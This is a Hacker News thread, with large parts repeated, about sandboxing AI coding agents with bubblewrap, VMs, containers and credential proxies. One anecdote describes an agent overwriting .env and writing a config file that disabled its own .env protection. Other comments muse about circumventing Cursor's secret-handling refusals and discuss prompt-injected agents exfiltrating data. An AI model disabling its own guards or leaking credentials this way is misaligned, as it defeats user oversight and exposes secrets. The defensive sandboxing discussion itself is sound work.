I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:
- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).
- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).
I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here, seems you always get the worst of both worlds if you do that.
Maybe the usecase for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaving a secret that's in context? So it's not that it's a 'mixed' usecase but rather it's just increasing safety in the supervised case?
I was using opencode the other day. It took me a while to realize the that the agent couldn't read/write the .env file but didn't realize it. When I pushed it first it was able to create a temp file and copy it over .env AND write and opencode.json file that disables the .env protection and go wild.
It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:
> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.
The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.
I totally understand, Vagrant and VirtualBox are quite a blast from the past for me as well. But besides the what-are-the-odds bug, it's been smooth sailing.
> VMs with 3D acceleration
I think we don't even need 3D acceleration since Vagrant is running the VMs headless anyways and just ssh-ing in.
> Incus (on Linux hosts)
That looks interesting, though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?), but I guess a good old shell script could replace that, even if imperative can be more annoying than declarative.
And since it seems to have a full-VM mode, docker would also work without exposing the host docker socket.
Thanks for the tip, it looks promising, I need to try it out!
You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to fist copy the code with git-worktree, then share that with the container.
As someone that does this, it's Turtles All The Way Down [1]. Every layer has escapes. I require people to climb up multiple turtles thus breaking most skiddie [2] scripts. Attacks will have to targeted and custom crafted by people that can actually code thus reducing the amount of turds in the swimming pool I must avoid. People should not write apps that make assumptions around accessing sensitive files.
It's turtles all the way down but there is a VERY big gap between VM Isolation Turtle and <a half-arse seccomp policy> turtle. It's a qualitative difference between those two sandboxes.
It’s a risk/convenience tradeoff. The biggest threat is Claude accidentally accesses and leaks your ssl keys, or gets prompt-hijacked to do the same. A simple sandbox fixes this.
There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.
Is there a premade VM image or docker container I can just start with for example Google Antigravity, Claude or Kilocode/vscode? Right now I have to install some linux desktop and all the tools needed, a bit of a pain IMO.
I see there are cloud VMs like at kilocode but they are kind if useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud.
The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.
This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.
I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.
Locally, I'd use Vagrant with a provisioning script that installs whatever you need on top of one of the prebuilt Vagrant boxes. You can then snapshot that if you want and turn that into a base image for subsequent containers.
- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`
- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`
And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)
I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.
I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
Claude definitely has some API token security baked in, it saw some API keys in a log file of mine the other day and called them out to me as a security issue very clearly. In this case it was a false positive but it handled the situation well and even gave links to reset each token.
If your prompt is complex enough, doesn’t seem to get triggered.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
It seems depends on model and context usage though, the agent forgets a lot of things after half fill up. It even forgets the primary target you give at the start of chat.
I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
I also wrote a tool for doing this[0], after one of these agents edited a config file outside of the repo it was supposed to work within.
I only realized the edit because I have my dotfiles symlinked to a git repository, and git status showed it when I was committing another change.
It's likely that the agents are making changes that I (and others) are not aware of because there is no easy way to detect them.
The approach I started taking is mounting the directory, that I want the agent to work on, into a container.
I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to.
I also mount any config it might need as read-only.
The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout.
I want a tool for managing agents, and I want each agent to be its own process, in its own container.
But just locking up the whole mess seems to work for now.
I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.
I put all my agents in a docker file in which the code I'm working on is mounted. It's working perfectly for me until now. I even set it up so I can run gui apps like antigravity in it (X11). If anyone is interested I shared my setup at https://github.com/asfaload/agents_container
In theory the docker container should only have the projects directory mounted, open access to the internet, and thats it. No access to anything else on the host or the local network.
Internet to connect with the provider, install packages, and search.
of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!
I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about
Perhaps I'm off base here but it seems like the goal is:
1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.
2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.
If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.
Very interested in being wrong about this. Please correct me!
You can accomplish both goals by setting up a proxy server to the API, and giving the agent access to the proxy.
You setup a simple proxy server on localhost:1234 that forwards all incoming requests to the real API and the crucial part is that the proxy adds the "Auth" header with the real auth token.
This way, the agent never sees the actual auth token, and doesn't have access to it.
If the agent has full internet access then there are still risks. For example, a malicious website could convince the agent itself to perform malicious requests against the API (like delete everything, or download all data and then upload it all to some hacker server).
But in terms of the security of the auth token itself, this system is 100% secure.
I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!
Great question. I just checked, and because I launch my entire VSCode with `op run …` (which makes dev life easier), Claude reports that it can read my dev secrets.
I could prevent this by running Claude outside of this context. I'm not going to, because this context only has access to my dev secrets. Hence the vault name: `81 Dev environment variables`.
I've configured it so that the 1P CLI only has access to that vault. My prod secrets are in another vault. I achieve this via a OP_SERVICE_ACCOUNT_TOKEN variable set in .zshrc.
I can verify this works by running:
op run --env-file='.env.production' -- printenv
[ERROR] 2026/01/15 21:37:41 "82 Prod environment variables" isn't a vault in this account. Specify the vault with its ID or name.
Also, of course, 1Password pops up a fingerprint request every time something tries to read its database. So if that happened unexpectedly, I'd wonder what was up. I'm acutely conscious of those requests.
I can't imagine it's perfect, but I feel pretty good.
bubblewrap is a lot more flexible: You can freely piece together the sandboxed filesystem environment from existing directories, tmpfs, files or data provided via a file descriptor. landrun, from what I understand only restricts what already exists. What is neat with landrun is the TCP port restrictions. This isn't possible with bubblewrap at the moment, although nothing really prevents bubblewrap from adding landlock support for those cases.
Great writeup! An alternative I have explored (more for defense against supply-chain attacks than for agents admittedly) is to use rootless Podman to get a dev-container-like experience alongside sandboxing. To this end I have built https://github.com/Gerharddc/litterbox (https://litterbox.work/) which greatly simplifies container setup and integrates a special ssh-agent for sandboxing that always prompts the user before signing requests (as to keep your SSH keys safe).
Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.
Note that bubblewrap can't protect you from misconfiguration, a kernel exploit or if you expose sensitive protocols to the workload inside (eg. x11 or even Wayland without a security context). Generally, it will do a passable job in protecting you from an automated no-0day attack script.
> When one of the models detected that it was being used for “egregiously immoral” purposes, it would attempt to “use command-line tools to contact the press, contact regulators, try to lock you out of the relevant systems, or all of the above,”
I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?
Bubblewrap is a it's a very minimal setuid binary. It's 4000 lines of C but essentially all it does is parse your flags ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
Great question! You might enjoy this writeup, which in one section explores avoiding the use of shell variables that are not exported as a method of mitigating this risk.
If you don't mind a suid program, "firejail --private" is a lot less to type and seems to work extremely similarly. By default it will delete anything created in the newly-empty home folder on exit, unless you instead use --private=somedir to save it there instead.
Kinda funny that a lot of devs accepted that LLMs are basically doing RCE on their machines, but instead of halting from using `--dangerously-skip-permissions` or similar bad ideas, we're finding workarounds to convince ourselves it's not that bad
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
Why not just demand agents that don't expose the dangerous tools in the first place? Like, have them directly provide functionality (and clearly consider what's secure, sanitize any paths in the tool use request, etc.) instead of punting to Bash?
Because it's impossible for fundamental reasons, period. You can't "sanitize" inputs and outputs of a fully general-purpose tool, which an LLM is, any more than you can "sanitize" inputs and outputs of people - not in a perfect sense you seem to be expecting here. There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
> There is no grammar you can restrict LLMs to; for a system like this, the semantics are total and open-ended. It's what makes them work.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You seem to be saying "I want all the benefits of YOLO mode without YOLO mode". You can just… use the normal mode if you want more security, it asks for permission for things.
> Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
One of the things Claude can do is write its own tools, even its own programming languages. There's no fundamental way to make it impossible to run something dangerous, there is only trust.
It's remarkable that these models are now good enough that people can get away with trusting them like this. But, as Simon has himself said on other occasions, this is "normalisation of deviance". I'm rather the opposite: as I have minimal security experience but also have a few decades of watching news about corporations suffering leaks, I am absolutely not willing to run in YOLO mode at this point, even though I already have an entirely separate machine for claude with the bare minimum of other things logged in, to the extent that it's a separate github account specifically for untrusted devices.
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
Yes. My proposal is to not give the agent Bash, because it is not required for the sorts of things you want it to be able to do. You can whitelist specific actions, like git commits and file writes within a specific directory. If the LLM proposes to read a URL, that doesn't require arbitrary code; it requires a system that can validate the URL, construct a `curl` etc. command itself, and pipe data to the LLM.
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
> write new code and execute that code (how else can it iterate?)
Yeah, this is the point where I'd want to keep a human in the loop. Because you'd do that if you were pair programming with a human on the same computer, right?
It is very much required for the sorts of things I want to do. In any case, if you deny the agent the bash tool, it will just write a Python script to do what it wanted instead.
Tools may become dangerous due to a combination of flags. `ln -sf /dev/null /my-file` will make that file empty (not really, but that's beside the point).
Yes. My proposal is that the part of the system that actually executes the command, instead of trying to parse the LLM's proposed command and validate/quote/escape/etc. it, should expose an API that only includes safe actions. The LLM says "I want to create a symbolic link from foo to bar" and the agent ensures that both ends of that are on the accept list and then writes the command itself. The LLM says "I want to run this cryptic Bash command" and the agent says "sorry, I have no idea what you mean, what's Bash?".
That's a distinction without a difference, in the end you still have an arbitrary bash command that you have to validate.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Wherever you add a new script or utility to a whitelist, you have to actively think whether any new combination may lead to privileges escalation or unintended effects.
No, that argument makes no sense. SQL injection doesn't happen because of where the input comes from; it happens because of how the input is handled. We can avoid Bobby Tables scenarios while receiving input that influences SQL queries from humans, never mind neural networks. We do it by controlling the system that transforms the input into a query (e.g. by using properly parameterized queries).
I feel like you can get 80% of the benefits and none of the risks with just accept edits mode and some whitelisted bash commands for running tests, etc.
Shouldn’t companies like Anthropic be on the hook for creating tools that default to running YOLO mode securely? Why is it up to 3rd parties to add safety to their products?
Just like every package manager already does? This issue predates LLMs and people have never cared enough to pressure dev tooling into caring. LLMs have seemingly created a world where people are finally trying to solve the long existing "oh shit there's code execution everywhere in my dev environment where I have insane levels of access to prod etc" problem.
Or just holding the tool the way it’s meant to be held :)
I’ll stop torturing the analogy now, but what I mean by that is that you can use the tools productively and safely. The insistence on running everything as the same user seems unnecessary. It’s like an X-Y problem.
Really this is on the tool makers (looking at you Anthropic) not prioritizing security by default so the users can just use the tools without getting burned and without losing velocity.
This is exactly what I want, but don't really want to run Docker all the time. Nicer git worktrees and isolation of code so I can run multiple agents. It even has the setup command stuff so "npm install" runs automatically.
I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.
I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.
I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
My way of preventing agents from accessing my .env files is not to use agents anywhere near files with secrets. Also, maybe people forget you’re not supposed to leave actual secrets lingering on your development system.
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
Had this same idea in my head. Glad someone done it. For me the motivation is not LLMs but to have something as convenient as docker without waiting for image builds. A fast docker for running a bunch of services locally where perfect isolation and imaging doesnt matter.
I want to like flatpak but I am genuinely unable to understand the state of cli tools in flatpak or even how to develop it. It all seems very weird to build upon as compared to docker
I really don't understand why people have all these "lightweight" ways of sandboxing agents. In my view there are two models:
- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).
- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).
I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here, seems you always get the worst of both worlds if you do that.
Maybe the usecase for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaving a secret that's in context? So it's not that it's a 'mixed' usecase but rather it's just increasing safety in the supervised case?
I was using opencode the other day. It took me a while to realize the that the agent couldn't read/write the .env file but didn't realize it. When I pushed it first it was able to create a temp file and copy it over .env AND write and opencode.json file that disables the .env protection and go wild.
> unsupervised in a VM in the cloud where the agent has root
Why in the cloud and not in a local VM?
I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.
https://blog.emilburzo.com/2026/01/running-claude-code-dange...
It's been ages since I used VirtualBox and reading the following didn't make me miss the experience at all:
> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.
The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.
I totally understand, Vagrant and VirtualBox are quite a blast from the past for me as well. But besides the what-are-the-odds bug, it's been smooth sailing.
> VMs with 3D acceleration
I think we don't even need 3D acceleration since Vagrant is running the VMs headless anyways and just ssh-ing in.
> Incus (on Linux hosts)
That looks interesting, though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?), but I guess a good old shell script could replace that, even if imperative can be more annoying than declarative.
And since it seems to have a full-VM mode, docker would also work without exposing the host docker socket.
Thanks for the tip, it looks promising, I need to try it out!
> though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?)
It's just YAML config for the VM's resources:
https://linuxcontainers.org/incus/docs/main/howto/instances_...
https://linuxcontainers.org/incus/docs/main/explanation/inst...
And cloud-init for provisioning:
https://gitlab.oit.duke.edu/jnt6/incus-config/-/blob/main/co...
You mentioned "deleting the actual project, since the file sync is two-way", my solution (in agentastic.dev) was to fist copy the code with git-worktree, then share that with the container.
Yeah local is totally fine too just whatever is easiest to set up.
As someone that does this, it's Turtles All The Way Down [1]. Every layer has escapes. I require people to climb up multiple turtles thus breaking most skiddie [2] scripts. Attacks will have to targeted and custom crafted by people that can actually code thus reducing the amount of turds in the swimming pool I must avoid. People should not write apps that make assumptions around accessing sensitive files.
[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down
[2] - https://en.wikipedia.org/wiki/Skiddies
It's turtles all the way down but there is a VERY big gap between VM Isolation Turtle and <a half-arse seccomp policy> turtle. It's a qualitative difference between those two sandboxes.
(If the VM is remote, even more so).
It’s a risk/convenience tradeoff. The biggest threat is Claude accidentally accesses and leaks your ssl keys, or gets prompt-hijacked to do the same. A simple sandbox fixes this.
There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.
How does a simple sandbox fix this at all? If Claude has been prompt-hijacked you need a VM to be anywhere near safe.
Prompt-hijacking is unlikely. GP is most likely trying to prevent mistakes, not malicious behavior.
Is there a premade VM image or docker container I can just start with for example Google Antigravity, Claude or Kilocode/vscode? Right now I have to install some linux desktop and all the tools needed, a bit of a pain IMO.
I see there are cloud VMs like at kilocode but they are kind if useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud.
I use https://jules.google.
The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.
This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.
I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.
Locally, I'd use Vagrant with a provisioning script that installs whatever you need on top of one of the prebuilt Vagrant boxes. You can then snapshot that if you want and turn that into a base image for subsequent containers.
> [...] and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud
Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.
fly.io launched something like that recently:
https://sprites.dev/
Just got started with Claude Code the other day, using the dev container CLI. It's super easy.
TLDR:
- Ensure that you have installed npm on your machine.
- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`
- Clone the Claude Code repo: https://github.com/anthropics/claude-code
- Navigate into the root directory of that repo.
- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`
- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`
And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)
I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.
I recommend caution with this bit:
That directory has a bunch of of sensitive stuff in it, most notable the transcripts of all of your previous Claude Code sessions.You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.
I think that the rw directories should not be shared among projects. Maybe there should be separate copies even for what gets mounted into $HOME/.nvm
Wonderful insight! Thank you!
I recently created a throwaway API key for cloudflare and asked a cursor cloud agent to deploy some infra using it, but it responded with this:
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
Claude definitely has some API token security baked in, it saw some API keys in a log file of mine the other day and called them out to me as a security issue very clearly. In this case it was a false positive but it handled the situation well and even gave links to reset each token.
If your prompt is complex enough, doesn’t seem to get triggered.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
It seems depends on model and context usage though, the agent forgets a lot of things after half fill up. It even forgets the primary target you give at the start of chat.
I find it better to bubblewrap against a full sandbox directory. Using docker, you can export an image to a single tarball archive, flattening all layers. I use a compatible base image for my kernel/distro, and unpack the image archive into a directory.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
I also wrote a tool for doing this[0], after one of these agents edited a config file outside of the repo it was supposed to work within. I only realized the edit because I have my dotfiles symlinked to a git repository, and git status showed it when I was committing another change. It's likely that the agents are making changes that I (and others) are not aware of because there is no easy way to detect them.
The approach I started taking is mounting the directory, that I want the agent to work on, into a container. I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to. I also mount any config it might need as read-only.
The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout. I want a tool for managing agents, and I want each agent to be its own process, in its own container. But just locking up the whole mess seems to work for now.
I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.
[0] https://github.com/brendoncarroll/nnc
I put all my agents in a docker file in which the code I'm working on is mounted. It's working perfectly for me until now. I even set it up so I can run gui apps like antigravity in it (X11). If anyone is interested I shared my setup at https://github.com/asfaload/agents_container
It won’t save you from prompt injektions that attack your network.
Shameless plug, in case you're interested: https://github.com/EstebanForge/construct-cli
Let me know if you give it a go ;)
Interesting, any plans to add LiteLLM (https://github.com/BerriAI/litellm) and Kilocode (https://github.com/Kilo-Org/kilocode)?
Will check those out :)
In theory the docker container should only have the projects directory mounted, open access to the internet, and thats it. No access to anything else on the host or the local network.
Internet to connect with the provider, install packages, and search.
It's not perfect but it's a start.
Docker containers run in their separate isolated network
[dead]
[dead]
of course, I'm not pretending this is a universal remedy solving all the problems. But I will add a note in the readme to make it clear, thanks for the feedback!
I've been saying bubblewrap is an amazing solution for years (and sandbox-exec as a mac alternative). This is the only way i run agents on systems i care about
> run agents on systems i care about
You must not care about those systems that much.
I wonder why we are even storing secrets in .env files in plain text
This wouldn't have made the front page if it was: "How to not store your secrets in plain text"
I would also prefer not doing this. Does anyone know of any lightweight, cross platform alternatives?
I use sops and age, originally loosely based on this article: https://devops.datenkollektiv.de/using-sops-with-age-and-git...
I originally set up the git filters, but later disabled them.
Perhaps I'm off base here but it seems like the goal is:
1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.
2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.
If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.
Very interested in being wrong about this. Please correct me!
You can accomplish both goals by setting up a proxy server to the API, and giving the agent access to the proxy.
You setup a simple proxy server on localhost:1234 that forwards all incoming requests to the real API and the crucial part is that the proxy adds the "Auth" header with the real auth token.
This way, the agent never sees the actual auth token, and doesn't have access to it.
If the agent has full internet access then there are still risks. For example, a malicious website could convince the agent itself to perform malicious requests against the API (like delete everything, or download all data and then upload it all to some hacker server).
But in terms of the security of the auth token itself, this system is 100% secure.
You’ve got my intent correct!
Where I’m at with #2 is the agent builds a prototype with its own private session credentials.
I have orchestration created that can replicate the prototyping session.
From there I can keep final build keys secret from the agent.
My build loop is meant to build an experiment first, and then an enduring build based on what it figures out.
https://www.passwordstore.org/
You can easily script it to decode passwords on demand.
If your .env file is being sourced by something like direnv, you can have it read secrets from the secret storage service and export them as env vars.
If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.
I would like an answer, too.
I wish I had the opposite of this. It’s a race trying to come up with new ways to have Cursor edit and set my env files past all their blocking techniques!
Like this? (Obfuscated, from agent and history)
https://bsky.app/profile/verdverm.com/post/3mbo7ko5ek22n
If you wouldn't upload keys to github, why would you trust them to cursor?
A local .env should be safe to put on your T shirt and walk down times square.
Mysql user: test
Password: mypass123
Host: localhost
...
STRIPE_SECRET_KEY="op://81 Dev environment variables/Stripe - dev - API keys/STRIPE_SECRET_KEY"
https://developer.1password.com/docs/cli/
How does that prevent an agent from leaking it once it's read into context?
Great question. I just checked, and because I launch my entire VSCode with `op run …` (which makes dev life easier), Claude reports that it can read my dev secrets.
I could prevent this by running Claude outside of this context. I'm not going to, because this context only has access to my dev secrets. Hence the vault name: `81 Dev environment variables`.
I've configured it so that the 1P CLI only has access to that vault. My prod secrets are in another vault. I achieve this via a OP_SERVICE_ACCOUNT_TOKEN variable set in .zshrc.
I can verify this works by running:
Also, of course, 1Password pops up a fingerprint request every time something tries to read its database. So if that happened unexpectedly, I'd wonder what was up. I'm acutely conscious of those requests.I can't imagine it's perfect, but I feel pretty good.
Create a symlink to .env from another file and ask cursor to refer it if name is the concern regarding cursor (I don't knowhow cursor does this stuff)
Isn't landrun the preferred way to sandbox apps on linux these days instead?
https://github.com/Zouuup/landrun
Bubblewrap seems to be much more popular[^1], personally this is the first time I heard about landrun
[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information
bubblewrap is a lot more flexible: You can freely piece together the sandboxed filesystem environment from existing directories, tmpfs, files or data provided via a file descriptor. landrun, from what I understand only restricts what already exists. What is neat with landrun is the TCP port restrictions. This isn't possible with bubblewrap at the moment, although nothing really prevents bubblewrap from adding landlock support for those cases.
Great writeup! An alternative I have explored (more for defense against supply-chain attacks than for agents admittedly) is to use rootless Podman to get a dev-container-like experience alongside sandboxing. To this end I have built https://github.com/Gerharddc/litterbox (https://litterbox.work/) which greatly simplifies container setup and integrates a special ssh-agent for sandboxing that always prompts the user before signing requests (as to keep your SSH keys safe).
Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.
My workflow even before Claude code.
1. I never use permanent credentials for AWS on my local computer.
2. I never have keys anywhere on my local computer. I put them in AWS Secret Manager.
3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).
It’s not foolproof. But it does reduce the attack surface.
Note that bubblewrap can't protect you from misconfiguration, a kernel exploit or if you expose sensitive protocols to the workload inside (eg. x11 or even Wayland without a security context). Generally, it will do a passable job in protecting you from an automated no-0day attack script.
> When one of the models detected that it was being used for “egregiously immoral” purposes, it would attempt to “use command-line tools to contact the press, contact regulators, try to lock you out of the relevant systems, or all of the above,”
https://www.wired.com/story/anthropic-claude-snitch-emergent...
I haven’t used agents as much as I should, so forgive the ignorance. But a docker compose file seems much more general purpose and flexible to me. It’s a mature and well-tested technology that seems to fit this use case pretty well. It also lets you run all kinds of other services easily. Are there any good articles on the state of sandboxing for agents and why docker isn’t sufficient? I guess the article mentioned docker having a lot of config files or being complex, is that the only reason?
Docker containers aren't safe enough to run untrusted code, there are privilege escalation vulnerabilities reported fairly often.
The common wisdom used to be that containers are not a security boundary. Is that still the case?
